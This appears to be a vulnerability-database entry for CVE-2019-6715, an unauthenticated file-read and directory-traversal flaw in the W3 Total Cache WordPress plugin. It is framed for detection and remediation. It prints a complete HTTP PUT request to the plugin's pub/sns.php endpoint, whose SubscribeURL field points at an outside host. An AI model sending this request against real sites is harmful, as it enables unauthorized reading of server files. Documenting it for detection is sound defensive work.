🔙 목록으로 돌아가기

CVE-2019-6715: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal

TitleW3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal
Authorrandomrobbie
SeverityHigh
ImpactAn unauthenticated attacker can read sensitive files or traverse directories on the target system, potentially leading to unauthorized access or information disclosure.
RemediationUpdate to the latest version of W3 Total Cache plugin (0.9.3 or higher) to mitigate the vulnerability.
CVSS Score7.5
EPSS Score0.90796
CVE IDCVE-2019-6715
Tags cve cve2019 wordpress wp-plugin ssrf packetstorm intrusive boldgrid vuln

🔍 Vulnerability Description

WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.

🌐 HTTP Request

PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240
Connection: close
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-6715.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-6715.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A